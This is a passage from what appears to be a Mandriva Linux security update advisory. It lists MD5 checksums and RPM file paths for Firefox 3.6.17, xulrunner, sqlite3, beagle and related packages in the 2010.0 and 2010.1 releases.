2010.0/x86_64/firefox-af-3.6.17-0.1mdv2010.0.x86_64.rpm f4b0c8b86490fdf9a9c25974a92689ca 2010.0/x86_64/firefox-ar-3.6.17-0.1mdv2010.0.x86_64.rpm 57ffe1be3cdd0af944259ed114231810 2010.0/x86_64/firefox-be-3.6.17-0.1mdv2010.0.x86_64.rpm 8aeadd5d3e3e47715d51ea3a82843128 2010.0/x86_64/firefox-bg-3.6.17-0.1mdv2010.0.x86_64.rpm ff79968fce36b922b8d98e0eb9b816c8 2010.0/x86_64/firefox-bn-3.6.17-0.1mdv2010.0.x86_64.rpm d09d62f420535517de8bf4541b3a8fec 2010.0/x86_64/firefox-ca-3.6.17-0.1mdv2010.0.x86_64.rpm af07bb511e838122ffc241b2209e580e 2010.0/x86_64/firefox-cs-3.6.17-0.1mdv2010.0.x86_64.rpm d2e567af634fb4000251ae2c28bfbd60 2010.0/x86_64/firefox-cy-3.6.17-0.1mdv2010.0.x86_64.rpm 0d86423290f5f10c717e7535e80a3617 2010.0/x86_64/firefox-da-3.6.17-0.1mdv2010.0.x86_64.rpm 6771eac9d9f1b5d3b93dea3fa1eddb43 2010.0/x86_64/firefox-de-3.6.17-0.1mdv2010.0.x86_64.rpm 149d869189abd70972ff431b3fa8c30d 2010.0/x86_64/firefox-devel-3.6.17-0.1mdv2010.0.x86_64.rpm 238759b4136c3b9265bbcb9e0be9bb5f 2010.0/x86_64/firefox-el-3.6.17-0.1mdv2010.0.x86_64.rpm 5b3990e5fd90c56b711a836669d201a3 2010.0/x86_64/firefox-en_GB-3.6.17-0.1mdv2010.0.x86_64.rpm b672e3ff071c07ab7f177c20328db06f 2010.0/x86_64/firefox-eo-3.6.17-0.1mdv2010.0.x86_64.rpm 4b9a27c7bdcb609968c82eaf20b5aee7 2010.0/x86_64/firefox-es_AR-3.6.17-0.1mdv2010.0.x86_64.rpm 9ac337f09f15f9b3a1322630167d4ac6 2010.0/x86_64/firefox-es_ES-3.6.17-0.1mdv2010.0.x86_64.rpm c880f83263f5fa4a1c52dcdaf2c5e861 2010.0/x86_64/firefox-et-3.6.17-0.1mdv2010.0.x86_64.rpm 1ddd1520b4f8b9218650aa613918a33c 2010.0/x86_64/firefox-eu-3.6.17-0.1mdv2010.0.x86_64.rpm 8214d724c4ae2a82b3698dc8d657fe10 2010.0/x86_64/firefox-ext-beagle-0.3.9-20.24mdv2010.0.x86_64.rpm fe0be0de58803f286786cd0e9c889ee6 2010.0/x86_64/firefox-ext-blogrovr-1.1.804-6.19mdv2010.0.x86_64.rpm 304a74743e71b80d8bd13ce2a394985d 2010.0/x86_64/firefox-ext-mozvoikko-1.0-6.19mdv2010.0.x86_64.rpm 9d4f9089e453c405327804fe295009a8 2010.0/x86_64/firefox-ext-plasmanotify-0.3.1-0.14mdv2010.0.x86_64.rpm b803bbf7342e3af31538727458c9f90e 2010.0/x86_64/firefox-ext-r-kiosk-0.7.2-9.19mdv2010.0.x86_64.rpm 9cf49c740dd4865a1564b33b7a41d585 2010.0/x86_64/firefox-ext-scribefire-3.5.1-0.13mdv2010.0.x86_64.rpm 24e754bed0908dc1f951803e707ce567 2010.0/x86_64/firefox-fi-3.6.17-0.1mdv2010.0.x86_64.rpm 79d473fe7d47dabac82fad423557513c 2010.0/x86_64/firefox-fr-3.6.17-0.1mdv2010.0.x86_64.rpm 902c5eac74afbdb862c1b2cfb0c21ef0 2010.0/x86_64/firefox-fy-3.6.17-0.1mdv2010.0.x86_64.rpm 5b064f04e0c27f27ae69a6e8e4cdbf7f 2010.0/x86_64/firefox-ga_IE-3.6.17-0.1mdv2010.0.x86_64.rpm fffe860a112c49980994d476b793eb53 2010.0/x86_64/firefox-gl-3.6.17-0.1mdv2010.0.x86_64.rpm a52c856435cb5c50b8ae2155928b5244 2010.0/x86_64/firefox-gu_IN-3.6.17-0.1mdv2010.0.x86_64.rpm 05ea1476c038511a2b4a46034c6ab290 2010.0/x86_64/firefox-he-3.6.17-0.1mdv2010.0.x86_64.rpm 9273f6a64382ba0dc683fa32e61f1bb2 2010.0/x86_64/firefox-hi-3.6.17-0.1mdv2010.0.x86_64.rpm 4ef3c6fccb7d7bf5b4c0f11abceaf0f5 2010.0/x86_64/firefox-hu-3.6.17-0.1mdv2010.0.x86_64.rpm 0346f17a58b3a444c02fd35fba01458a 2010.0/x86_64/firefox-id-3.6.17-0.1mdv2010.0.x86_64.rpm 2318d466a80d30bf6f2e985647010faa 2010.0/x86_64/firefox-is-3.6.17-0.1mdv2010.0.x86_64.rpm 9a6d1f0e13346155bd81fc3340f89890 2010.0/x86_64/firefox-it-3.6.17-0.1mdv2010.0.x86_64.rpm 63cebbb431c2915c86c4d5c22c5f154a 2010.0/x86_64/firefox-ja-3.6.17-0.1mdv2010.0.x86_64.rpm c384ffcffcd6e3ad4536183ccf5bcd9f 2010.0/x86_64/firefox-ka-3.6.17-0.1mdv2010.0.x86_64.rpm b6ee1fefececab34c485fff2bb2e0340 2010.0/x86_64/firefox-kn-3.6.17-0.1mdv2010.0.x86_64.rpm b0ae37fdeff27404b04b97e4f25b3286 2010.0/x86_64/firefox-ko-3.6.17-0.1mdv2010.0.x86_64.rpm 18bd8f78a8172bbca00432df5d8ab6a2 2010.0/x86_64/firefox-ku-3.6.17-0.1mdv2010.0.x86_64.rpm 06432e71e5f7721c08dc958d3da8db23 2010.0/x86_64/firefox-lt-3.6.17-0.1mdv2010.0.x86_64.rpm 73d6ca4e1e5b5ccb8b2699f985eb46e4 2010.0/x86_64/firefox-lv-3.6.17-0.1mdv2010.0.x86_64.rpm 4d367666ed89679260e7d8c2f747c1cf 2010.0/x86_64/firefox-mk-3.6.17-0.1mdv2010.0.x86_64.rpm ee7c636c3f90c90448117eac31aa87d3 2010.0/x86_64/firefox-mr-3.6.17-0.1mdv2010.0.x86_64.rpm c23330441a1939016356bc7366a683e5 2010.0/x86_64/firefox-nb_NO-3.6.17-0.1mdv2010.0.x86_64.rpm ce40b26758f7aa07d0a778a8c8c9a869 2010.0/x86_64/firefox-nl-3.6.17-0.1mdv2010.0.x86_64.rpm 0951798322644efd44f6c2aff2ca282a 2010.0/x86_64/firefox-nn_NO-3.6.17-0.1mdv2010.0.x86_64.rpm 4e5d2f92e75e0d89ea4360d8fff8046c 2010.0/x86_64/firefox-oc-3.6.17-0.1mdv2010.0.x86_64.rpm 8f4ac7bf6a4d8a013f356ed84c52a5e9 2010.0/x86_64/firefox-pa_IN-3.6.17-0.1mdv2010.0.x86_64.rpm 3a731045099cd9ed850f9a321c0c84e3 2010.0/x86_64/firefox-pl-3.6.17-0.1mdv2010.0.x86_64.rpm 8a53363afc83d26a624f443105237a7e 2010.0/x86_64/firefox-pt_BR-3.6.17-0.1mdv2010.0.x86_64.rpm f59973b7a3072bef189f9a3767cb24ab 2010.0/x86_64/firefox-pt_PT-3.6.17-0.1mdv2010.0.x86_64.rpm 5501412ba991954e58e917fc526ddf60 2010.0/x86_64/firefox-ro-3.6.17-0.1mdv2010.0.x86_64.rpm acb0a6140acb5a4535d837963397a236 2010.0/x86_64/firefox-ru-3.6.17-0.1mdv2010.0.x86_64.rpm dc7d2a7df0902ab3dc633fb74eb9adbd 2010.0/x86_64/firefox-si-3.6.17-0.1mdv2010.0.x86_64.rpm 5067af9af1aabd868b536f310d031900 2010.0/x86_64/firefox-sk-3.6.17-0.1mdv2010.0.x86_64.rpm 0907f9829d35681cf8a6791cef140e54 2010.0/x86_64/firefox-sl-3.6.17-0.1mdv2010.0.x86_64.rpm 57187489089f47923ce21c9ecb51ec4e 2010.0/x86_64/firefox-sq-3.6.17-0.1mdv2010.0.x86_64.rpm 4d70e7d9ebf0bfe9b10a2747c102da70 2010.0/x86_64/firefox-sr-3.6.17-0.1mdv2010.0.x86_64.rpm 6acf58ff03814bb7fd18d8615715a7c1 2010.0/x86_64/firefox-sv_SE-3.6.17-0.1mdv2010.0.x86_64.rpm 267943c59c737740d5bc9755d942d218 2010.0/x86_64/firefox-te-3.6.17-0.1mdv2010.0.x86_64.rpm 6cce1edffc8c33b54a918ce261ed018e 2010.0/x86_64/firefox-th-3.6.17-0.1mdv2010.0.x86_64.rpm e055a883cdd6ca3c32c2cc730bfff8a7 2010.0/x86_64/firefox-theme-kfirefox-0.16-7.18mdv2010.0.x86_64.rpm 8ae0f6456b5cc9df16a92b2fc0bc2b0c 2010.0/x86_64/firefox-tr-3.6.17-0.1mdv2010.0.x86_64.rpm cfa6c76ff6518cf642c052bdc551a18a 2010.0/x86_64/firefox-uk-3.6.17-0.1mdv2010.0.x86_64.rpm 55017d39c0a0087d3bac20ec4ba4eb85 2010.0/x86_64/firefox-zh_CN-3.6.17-0.1mdv2010.0.x86_64.rpm 63dc4f884a0f1297e23fa5dc5e7c3cf5 2010.0/x86_64/firefox-zh_TW-3.6.17-0.1mdv2010.0.x86_64.rpm ee0c18920080702d3595cb7adae275f4 2010.0/x86_64/gnome-python-extras-2.25.3-10.19mdv2010.0.x86_64.rpm 5919c717c5a7f305c57d7c8df48b11a9 2010.0/x86_64/gnome-python-gda-2.25.3-10.19mdv2010.0.x86_64.rpm 562bd44a9be0630f52ce76aad2cefe0a 2010.0/x86_64/gnome-python-gda-devel-2.25.3-10.19mdv2010.0.x86_64.rpm 8cb0d40770f948e918f8c82942fcc761 2010.0/x86_64/gnome-python-gdl-2.25.3-10.19mdv2010.0.x86_64.rpm 4c2f19fef0720a1b23a23b96230df928 2010.0/x86_64/gnome-python-gtkhtml2-2.25.3-10.19mdv2010.0.x86_64.rpm 5e159bd5b05ac4765cac691315ebb389 2010.0/x86_64/gnome-python-gtkmozembed-2.25.3-10.19mdv2010.0.x86_64.rpm 887bebf0c67dd6ee749c05044c5b8ebb 2010.0/x86_64/gnome-python-gtkspell-2.25.3-10.19mdv2010.0.x86_64.rpm 3a1e5f6ee829cc818f287a7efd4d529d 2010.0/x86_64/google-gadgets-common-0.11.2-0.14mdv2010.0.x86_64.rpm a524c9ce952ce767b01b626e3cb816d2 2010.0/x86_64/google-gadgets-gtk-0.11.2-0.14mdv2010.0.x86_64.rpm 46b9c5ddc279d9f1fdf9b743ed651416 2010.0/x86_64/google-gadgets-qt-0.11.2-0.14mdv2010.0.x86_64.rpm bae5a5dd90cd5313f77c2a7ae009069e 2010.0/x86_64/lemon-3.7.4-0.1mdv2010.0.x86_64.rpm fc2b8cfae8a71b058d75c1474f44d1fc 2010.0/x86_64/lib64ggadget1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 72a1707675b38a97f6dd8b1e3af79077 2010.0/x86_64/lib64ggadget-dbus1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 286b4299556830c2bb109c507e226c15 2010.0/x86_64/lib64ggadget-gtk1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 5941285845cdaf816e947e1075cb5262 2010.0/x86_64/lib64ggadget-js1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 0cf1545c0ee9e59d85b417653e4fe73b 2010.0/x86_64/lib64ggadget-npapi1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 25d8d06e4057f91f3ec5f7aeeeaa88fb 2010.0/x86_64/lib64ggadget-qt1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm 8372ebd0bb8b13ef269c5e6262683fa5 2010.0/x86_64/lib64ggadget-webkitjs0-0.11.2-0.14mdv2010.0.x86_64.rpm 6b7548e88e5d630c380c8948dd3badf5 2010.0/x86_64/lib64ggadget-xdg1.0_0-0.11.2-0.14mdv2010.0.x86_64.rpm b77e42d31574efb78e25701c50f55ea6 2010.0/x86_64/lib64google-gadgets-devel-0.11.2-0.14mdv2010.0.x86_64.rpm d9d6b24145b1d34e0438b46bb30c37da 2010.0/x86_64/lib64opensc2-0.11.9-1.19mdv2010.0.x86_64.rpm e93eece7e774e29e7890e1d1487d3e1f 2010.0/x86_64/lib64opensc-devel-0.11.9-1.19mdv2010.0.x86_64.rpm a87a4cbec8ff5a04b86817e186139b78 2010.0/x86_64/lib64sqlite3_0-3.7.6.2-0.1mdv2010.0.x86_64.rpm a6df85f41686791ba19d706ea85ef4ce 2010.0/x86_64/lib64sqlite3-devel-3.7.6.2-0.1mdv2010.0.x86_64.rpm 40de3fdcbc3fb1324e0b3240227c447f 2010.0/x86_64/lib64sqlite3-static-devel-3.7.6.2-0.1mdv2010.0.x86_64.rpm 0113d0dc5addcc762b452a01f249c4dc 2010.0/x86_64/lib64xulrunner1.9.2.17-1.9.2.17-0.1mdv2010.0.x86_64.rpm 92b6e05534a1c3eceaca1cdb79112d99 2010.0/x86_64/lib64xulrunner-devel-1.9.2.17-0.1mdv2010.0.x86_64.rpm 9823b87815015254cb08ef4948509249 2010.0/x86_64/mozilla-plugin-opensc-0.11.9-1.19mdv2010.0.x86_64.rpm a95dcd7863f187f9926cc202e14ef578 2010.0/x86_64/mozilla-thunderbird-beagle-0.3.9-20.24mdv2010.0.x86_64.rpm f93d3ed66cde233df336291a66460ecc 2010.0/x86_64/opensc-0.11.9-1.19mdv2010.0.x86_64.rpm e920dc086da22a991f91a53665fedef8 2010.0/x86_64/sqlite3-tools-3.7.6.2-0.1mdv2010.0.x86_64.rpm 1c6c0d52e529171edb60a638c43b8809 2010.0/x86_64/xulrunner-1.9.2.17-0.1mdv2010.0.x86_64.rpm ae9a9a91c9e9ce6f70c29f2aad7fc8f1 2010.0/x86_64/yelp-2.28.0-1.21mdv2010.0.x86_64.rpm 872f3f5473c99556ba3676a2087618ac 2010.0/SRPMS/beagle-0.3.9-20.24mdv2010.0.src.rpm eb7c8b9b8b19f6cf7dab54a0128a7c3b 2010.0/SRPMS/firefox-3.6.17-0.1mdv2010.0.src.rpm b8a28536c5f5b90e1e56fcbccc0f7828 2010.0/SRPMS/firefox-ext-blogrovr-1.1.804-6.19mdv2010.0.src.rpm 0203c855fea4ad16b8bf3490c28a522a 2010.0/SRPMS/firefox-ext-mozvoikko-1.0-6.19mdv2010.0.src.rpm b01922e0aef070ea95b6fa98945fb685 2010.0/SRPMS/firefox-ext-plasmanotify-0.3.1-0.14mdv2010.0.src.rpm 16b3eb2d5945df96a9768051a3093b04 2010.0/SRPMS/firefox-ext-r-kiosk-0.7.2-9.19mdv2010.0.src.rpm 4e57990dc20e6089157a02b0dd7bad97 2010.0/SRPMS/firefox-ext-scribefire-3.5.1-0.13mdv2010.0.src.rpm 1e3f69cadbe70bffd1c7f7220f11792c 2010.0/SRPMS/firefox-l10n-3.6.17-0.1mdv2010.0.src.rpm 13d4fc5888b6dc2c2b7347de5ffe6282 2010.0/SRPMS/firefox-theme-kfirefox-0.16-7.18mdv2010.0.src.rpm 43f53231379e4b1ef09b31f24d329448 2010.0/SRPMS/gnome-python-extras-2.25.3-10.19mdv2010.0.src.rpm 15ead6d66f9b662b9a02a970717a5063 2010.0/SRPMS/google-gadgets-0.11.2-0.14mdv2010.0.src.rpm 24971ad45f4df34e024b071415dfe672 2010.0/SRPMS/lemon-3.7.4-0.1mdv2010.0.src.rpm 23959d528a982971b2f7e9016c3789b4 2010.0/SRPMS/opensc-0.11.9-1.19mdv2010.0.src.rpm 9de0929e70ecda34752e0ab536491e15 2010.0/SRPMS/sqlite3-3.7.6.2-0.1mdv2010.0.src.rpm 5983d5c4fe3694a9875e836334d73d98 2010.0/SRPMS/xulrunner-1.9.2.17-0.1mdv2010.0.src.rpm 4a673f357f57178cc398edbe72b749a9 2010.0/SRPMS/yelp-2.28.0-1.21mdv2010.0.src.rpm Mandriva Linux 2010.1: b8d77a5d048b82e38083d71ec55acf5b 2010.1/i586/beagle-0.3.9-40.14mdv2010.2.i586.rpm e3d539ad1fb243f6ddcf842a743d49cf 2010.1/i586/beagle-crawl-system-0.3.9-40.14mdv2010.2.i586.rpm d9e4d663700c0f54e19702cf2c53bde5 2010.1/i586/beagle-doc-0.3.9-40.14mdv2010.2.i586.rpm 72f328f300a35d37ed72ca7271049562 2010.1/i586/beagle-evolution-0.3.9-40.14mdv2010.2.i586.rpm 414eed08be2161f5c548f733cdbb29e1 2010.1/i586/beagle-gui-0.3.9-40.14mdv2010.2.i586.rpm e19385deaa5fb16118db1957762d6c23 2010.1/i586/beagle-gui-qt-0.3.9-40.14mdv2010.2.i586.rpm badd30997d1be55d54f9f84ed95c1cad 2010.1/i586/beagle-libs-0.3.9-40.14mdv2010.2.i586.rpm e3b3ae5312158ba23cf391bfdad5f414 2010.1/i586/firefox-3.6.17-0.1mdv2010.2.i586.rpm f92af2f4925734bb1d646486c763f61f 2010.1/i586/firefox-af-3.6.17-0.1mdv2010.2.i586.rpm 1bca461e767ede98a0a75027a7c90dd2 2010.1/i586/firefox-ar-3.6.17-0.1mdv2010.2.i586.rpm bd2e765f5f089c9737a3931dbe725449 2010.1/i586/firefox-be-3.6.17-0.1mdv2010.2.i586.rpm d626a973b6602a5333a6c6daf0fc408c 2010.1/i586/firefox-bg-3.6.17-0.1mdv2010.2.i586.rpm e97feb110482d0875e12e88dc15f307b 2010.1/i586/firefox-bn-3.6.17-0.1mdv2010.2.i586.rpm 71001a353742c8147820cdf9ac5b6800 2010.1/i586/firefox-ca-3.6.17-0.1mdv2010.2.i586.rpm 21627432dd2f58253114486374d61d59 2010.1/i586/firefox-cs-3.6.17-0.1mdv2010.2.i586.rpm 3c99e580e4d0b46870c2e14442b677da 2010.1/i586/firefox-cy-3.6.17-0.1mdv2010.2.i586.rpm 3f86c960410b6c2a5e7f1df15c044aba 2010.1/i586/firefox-da-3.6.17-0.1mdv2010.2.i586.rpm 1fedae2cb5b853bc05d59aaefa6c4e80 2010.1/i586/firefox-de-3.6.17-0.1mdv2010.2.i586.rpm 1b2125c2d7f7a3d1d7911624d57f3066 2010.1/i586/firefox-devel-3.6.17-0.1mdv2010.2.i586.rpm cc8ac2c81fbd8837c669186037aee17a 2010.1/i586/firefox-el-3.6.17-0.1mdv2010.2.i586.rpm 5998d4b9a23ba66596cd63337914102d 2010.1/i586/firefox-en_GB-3.6.17-0.1mdv2010.2.i586.rpm e1e28915674887756aab59c8162010b6 2010.1/i586/firefox-eo-3.6.17-0.1mdv2010.2.i586.rpm a4f356bf8f7658e57e92b37e132dfa2f 2010.1/i586/firefox-es_AR-3.6.17-0.1mdv2010.2.i586.rpm 2813ea1d4c713de227a59b2cd29524f5 2010.1/i586/firefox-es_ES-3.6.17-0.1mdv2010.2.i586.rpm afd3b8604a600cec91b0a4b7895c1f1c 2010.1/i586/firefox-et-3.6.17-0.1mdv2010.2.i586.rpm 00b5358da1d1a00658ebf357047e65ac 2010.1/i586/firefox-eu-3.6.17-0.1mdv2010.2.i586.rpm 567807249360485d9a322456e2e336e3 2010.1/i586/firefox-ext-beagle-0.3.9-40.14mdv2010.2.i586.rpm 1de6adc44baf182a7671f0eeb5eda1a9 2010.1/i586/firefox-ext-blogrovr-1.1.804-13.11mdv2010.2.i586.rpm 0ebcd27f5621c1d9158c142e043ebc3d 2010.1/i586/firefox-ext-mozvoikko-1.0.1-2.11mdv2010.2.i586.rpm 768c0d55de91eea79bd0d40fbaecb1fc 2010.1/i586/firefox-ext-r-kiosk-0.8.1-2.11mdv2010.2.i586.rpm e5d9d4d59a39804c168c94b0d90cec4d 2010.1/i586/firefox-ext-scribefire-3.5.2-2.11mdv2010.2.i586.rpm 4c1d4945db1eba350d96a3590165b376 2010.1/i586/firefox-ext-weave-sync-1.1-5.11mdv2010.2.i586.rpm adb3d90cdf0b58b5f25c51eca963033e 2010.1/i586/firefox-ext-xmarks-3.6.14-2.11mdv2010.2.i586.rpm 0646724c19d31f3a1b6335671b9fb05a 2010.1/i586/firefox-fi-3.6.17-0.1mdv2010.2.i586.rpm 4f604a22b3cd3f3bf60417b02285fc1b 2010.1/i586/firefox-fr-3.6.17-0.1mdv2010.2.i586.rpm a3b1a56c2bbde166e78a9ec485fbcf1f 2010.1/i586/firefox-fy-3.6.17-0.1mdv2010.2.i586.rpm 22ee1bf09632b4d95bfb91a704dfd601 2010.1/i586/firefox-ga_IE-3.6.17-0.1mdv2010.2.i586.rpm 3dd543adec09ff4b13d26eb47f1fb20f 2010.1/i586/firefox-gl-3.6.17-0.1mdv2010.2.i586.rpm cef28501b0781bed9d585632fba33e3e 2010.1/i586/firefox-gu_IN-3.6.17-0.1mdv2010.2.i586.rpm f4ab5aaca98491c489fed8d3a2235f2a 2010.1/i586/firefox-he-3.6.17-0.1mdv2010.2.i586.rpm e3c5485fd9db1ad9add1335457fb6c1e 2010.1/i586/firefox-hi-3.6.17-0.1mdv2010.2.i586.rpm c96b6c27fda6a085f746e37061b9b4a5 2010.1/i586/firefox-hu-3.6.17-0.1mdv2010.2.i586.rpm 1f3f0fe5cbfb262b8ec3b984ef85e70f 2010.1/i586/firefox-id-3.6.17-0.1mdv2010.2.i586.rpm 3dba18e4535dbaf221b0e7a1afe8fa33 2010.1/i586/firefox-is-3.6.17-0.1mdv2010.2.i586.rpm 1dbef08d68ebd0abfd9ee6b28c2de9c6 2010.1/i586/firefox-it-3.6.17-0.1mdv2010.2.i586.rpm 031319b736ca3835b1c76e0fb6b96138 2010.1/i586/firefox-ja-3.6.17-0.1mdv2010.2.i586.rpm c87c40a558b0790324235aa8f53e4c4c 2010.1/i586/firefox-ka-3.6.17-0.1mdv2010.2.i586.rpm 6cfad1e915715810a1a369177b2f5d61 2010.1/i586/firefox-kn-3.6.17-0.1mdv2010.2.i586.rpm 143d89c96b3ba277372b282ddc0dc8a5 2010.1/i586/firefox-ko-3.6.17-0.1mdv2010.2.i586.rpm 4875194da66fc7a25de2a3fea4a79e3c 2010.1/i586/firefox-ku-3.6.17-0.1mdv2010.2.i586.rpm 8e725f3963a96823755dd3867bf28602 2010.1/i586/firefox-lt-3.6.17-0.1mdv2010.2.i586.rpm 66b313862cb22ce6ca3c6968ee26921e 2010.1/i586/firefox-lv-3.6.17-0.1mdv2010.2.i586.rpm 12ee2c6feaa8cf8376fd8fca9f1bb722 2010.1/i586/firefox-mk-3.6.17-0.1mdv2010.2.i586.rpm c170010bfd5482745e1174c003c9d0a8 2010.1/i586/firefox-mr-3.6.17-0.1mdv2010.2.i586.rpm e0bb402c10e5c6b35dc76899edaa6a43 2010.1/i586/firefox-nb_NO-3.6.17-0.1mdv2010.2.i586.rpm 590f7c9ec9227931b504c40e3cfe4c98 2010.1/i586/firefox-nl-3.6.17-0.1mdv2010.2.i586.rpm a1f62132e8eff956ca229b175547bc8a 2010.1/i586/firefox-nn_NO-3.6.17-0.1mdv2010.2.i586.rpm 5d991dbc83349fbb8bb2499d6fe8a095 2010.1/i586/firefox-oc-3.6.17-0.1mdv2010.2.i586.rpm 759972b97f09651b51ba92309f31e2de 2010.1/i586/firefox-pa_IN-3.6.17-0.1mdv2010.2.i586.rpm 6e6b7219d1ecd591e41caa4123f63b76 2010.1/i586/firefox-pl-3.6.17-0.1mdv2010.2.i586.rpm bb83d279fae5a52f76ed0ae3d4a7db5a 2010.1/i586/firefox-pt_BR-3.6.17-0.1mdv2010.2.i586.rpm 187b4443ca26b0e68129ac504e6c5235 2010.1/i586/firefox-pt_PT-3.6.17-0.1mdv2010.2.i586.rpm d22c10d077178fff996622dfde792eae 2010.1/i586/firefox-ro-3.6.17-0.1mdv2010.2.i586.rpm aa705c1d5618f6f6e71326d2a32dd255 2010.1/i586/firefox-ru-3.6.17-0.1mdv2010.2.i586.rpm 5e125511f9e105f55cbd96f317ba803f 2010.1/i586/firefox-si-3.6.17-0.1mdv2010.2.i586.rpm 976971a940193cb0bf70f97b717498a8 2010.1/i586/firefox-sk-3.6.17-0.1mdv2010.2.i586.rpm 1cddfc6bef317349b436a912b003a7f5 2010.1/i586/firefox-sl-3.6.17-0.1mdv2010.2.i586.rpm 879b1deb0aaffaecd078ae7ba7618710 2010.1/i586/firefox-sq-3.6.17-0.1mdv2010.2.i586.rpm 7e6b068856ac8500bcd6aaa9c01e5e14 2010.1/i586/firefox-sr-3.6.17-0.1mdv2010.2.i586.rpm 05ca1b47948e9c5c86c7b17f94d3b2a1 2010.1/i586/firefox-sv_SE-3.6.17-0.1mdv2010.2.i586.rpm 6668f6102d4e613b1ffea6edc6f494e1 2010.1/i586/firefox-te-3.6.17-0.1mdv2010.2.i586.rpm 3931eb722acd12b3b1e8552001260e13 2010.1/i586/firefox-th-3.6.17-0.1mdv2010.2.i586.rpm fe40bc33f98e01c7e6f7245903d248ba 2010.1/i586/firefox-tr-3.6.17-0.1mdv2010.2.i586.rpm 06afc549b7a34202e01401ee90a57f51 2010.1/i586/firefox-uk-3.6.17-0.1mdv2010.2.i586.rpm daf5388854c9c080691f8ad6f2f4c571 2010.1/i586/firefox-zh_CN-3.6.17-0.1mdv2010.2.i586.rpm 2e5dac4baae18fdebeb079b87f0e2764 2010.1/i586/firefox-zh_TW-3.6.17-0.1mdv2010.2.i586.rpm c8ec76b45dd053157d27f447c5f68b38 2010.1/i586/gjs-0.6-4.11mdv2010.2.i586.rpm a6d96cbc1797a5ef4f3adc12890d041a 2010.1/i586/gnome-python-extras-2.25.3-18.11mdv2010.2.i586.rpm 864766bd22a9198507f8815e63164b64 2010.1/i586/gnome-python-gda-2.25.3-18.11mdv2010.2.i586.rpm d17affd30ae42d69c2cdedf964689a22 2010.1/i586/gnome-python-gda-devel-2.25.3-18.11mdv2010.2.i586.rpm be6778f5af28259cdb5863b8f8072c94 2010.1/i586/gnome-python-gdl-2.25.3-18.11mdv2010.2.i586.rpm 4ec3f5f41ab9795f615c4e703b42a0b0 2010.1/i586/gnome-python-gtkhtml2-2.25.3-18.11mdv2010.2.i586.rpm fcd4adc34b35af74db4fbc356f1cd968 2010.1/i586/gnome-python-gtkmozembed-2.25.3-18.11mdv2010.2.i586.rpm 9b48fdb112d3e76c72b98ed90b7b0ea5 2010.1/i586/gnome-python-gtkspell-2.25.3-18.11mdv2010.2.i586.rpm 8e546c115f1f1324554283e50e5c0717 2010.1/i586/lemon-3.7.4-0.1mdv2010.2.i586.rpm ef932e3117540da38e4ccc10cfa496ca 2010.1/i586/libgjs0-0.6-4.11mdv2010.2.i586.rpm 39fac8356ae39f2385561dc05df7c9bc 2010.1/i586/libgjs-devel-0.6-4.11mdv2010.2.i586.rpm 2135e4941c28926152d58b059fef2844 2010.1/i586/libsqlite3_0-3.7.6.2-0.1mdv2010.2.i586.rpm 47078c5879b0b16b3b9e1395401e7fcb 2010.1/i586/libsqlite3-devel-3.7.6.2-0.1mdv2010.2.i586.rpm 3972e1f7e649f3a7c851abcd50d713d2 2010.1/i586/libsqlite3-static-devel-3.7.6.2-0.1mdv2010.2.i586.rpm 2c4c36f08cfbd36d28682810a861ce43 2010.1/i586/libxulrunner1.9.2.17-1.9.2.17-0.1mdv2010.2.i586.rpm b13d7970d7a5ba930a8c514ba220701d 2010.1/i586/libxulrunner-devel-1.9.2.17-0.1mdv2010.2.i586.rpm 47acad2f47c9ba18d718f3abd69e93c2 2010.1/i586/mozilla-thunderbird-beagle-0.3.9-40.14mdv2010.2.i586.rpm c759ba0d2acb577d927a140904e55d1d 2010.1/i586/sqlite3-tools-3.7.6.2-0.1mdv2010.2.i586.rpm 06478b05f0815d4c27f510cbeb41931b 2010.1/i586/xulrunner-1.9.2.17-0.1mdv2010.2.i586.rpm 264d3c3677e06ad021b1cd3d877b3542 2010.1/i586/yelp-2.30.1-4.11mdv2010.2.i586.rpm f03639972840639a315ace5577a3f7d7 2010.1/SRPMS/beagle-0.3.9-40.14mdv2010.2.src.rpm 1b407792bc53910f470fef2aa107c4db 2010.1/SRPMS/firefox-3.6.17-0.1mdv2010.2.src.rpm cffc7531253d821db2a606e56993d5e1 2010.1/SRPMS/firefox-ext-blogrovr-1.1.804-13.11mdv2010.2.src.rpm 84480ce74b027244dc64794cbae17d07 2010.1/SRPMS/firefox-ext-mozvoikko-1.0.1-2.11mdv2010.2.src.rpm ec8e51d467efb46c6fad4d9a5e64af51 2010.1/SRPMS/firefox-ext-r-kiosk-0.8.1-2.11mdv2010.2.src.rpm 9626186349beb04c41ac48c21bf268b1 2010.1/SRPMS/firefox-ext-scribefire-3.5.2-2.11mdv2010.2.src.rpm e65da7beca8fa7edffd5a70da28161ec 2010.1/SRPMS/firefox-ext-weave-sync-1.1-5.11mdv2010.2.src.rpm c4ce7eec413e557445f66f2b167899a7 2010.1/SRPMS/firefox-ext-xmarks-3.6.14-2.11mdv2010.2.src.rpm 55bd4776f283283a5c8ab1906658b9c9 2010.1/SRPMS/firefox-l10n-3.6.17-0.1mdv2010.2.src.rpm e0bcbb8764bd02ec459e7252aec2d042 2010.1/SRPMS/gjs-0.6-4.11mdv2010.2.src.rpm 66f6688cea914918243d9afeefc443b2 2010.1/SRPMS/gnome-python-extras-2.25.3-18.11mdv2010.2.src.rpm f8304df757bbcc2d16d3198e3fda3d23 2010.1/SRPMS/lemon-3.7.4-0.1mdv2010.2.src.rpm 8b4cc9318b6004ece98b4d1057cea92d 2010.1/SRPMS/sqlite3-3.7.6.2-0.1mdv2010.2.src.rpm 6a7d4ed599fbf868d4a02a9e8d2933c8 2010.1/SRPMS/xulrunner-1.9.2.17-0.1mdv2010.2.src.rpm 8f9d8865473f416ec554aa017d0dccb1 2010.1/SRPMS/yelp-2.30.1-4.11mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 53032f4cd5d44f7b37aeb5cc171e0d1a 2010.1/x86_64/beagle-0.3.9-40.14mdv2010.2.x86_64.rpm de51591c9764ec279edf913edf302217 2010.1/x86_64/beagle-crawl-system-0.3.9-40.14mdv2010.2.x86_64.rpm bf4657dfed2ce3e1578f44930843fafc 2010.1/x86_64/beagle-doc-0.3.9-40.14mdv2010.2.x86_64.rpm a8dadcc375eb256aafeb35fe4526b5ce 2010.1/x86_64/beagle-evolution-0.3.9-40.14mdv2010.2.x86_64.rpm 